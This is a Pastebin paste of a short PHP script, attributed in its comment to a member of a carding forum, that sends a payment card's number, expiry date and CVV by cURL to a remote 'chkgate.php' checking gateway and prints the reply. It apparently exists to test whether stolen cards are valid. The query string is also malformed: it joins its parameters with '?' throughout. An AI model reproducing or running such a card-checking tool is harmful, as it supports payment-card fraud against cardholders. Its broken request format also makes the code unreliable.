Guest User

x

a guest
Feb 4th, 2016
43
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.75 KB | None | 0 0
  1. <?php
  2.  
  3. /* cvv.denhvideside.xyz API script by Syk0se from bcfclub - 04/02/2016 - This example script uses cURL */
  4.  
  5. // -----------Card Infos To Check ----------- //
  6. $ccnum = 'cardnumber'; // replace with the card infos you want to check
  7. $ccexpire = 'cardexpire'; //
  8. $cvv = 'cvv';
  9.  
  10. // -----------Account Infos----------- //
  11. $user = 'username';
  12. $pass = 'password';
  13.  
  14. // -----------API URL ----------- //
  15. $url = 'http://1.1.1.1/chkgate.php?chk='.$ccnum.'?exp='.$ccexpire.'?cvv='.$cvv;
  16.  
  17. // ----------- cURL Request ----------- //
  18. $curl = curl_init();
  19. curl_setopt($curl, CURLOPT_URL, $url);
  20. curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
  21. curl_setopt($curl, CURLOPT_HEADER, false);
  22. $download = curl_exec($curl);
  23. print $download;
  24. curl_close($curl);
  25.  
  26. ?>
Add Comment
Please, Sign In to add comment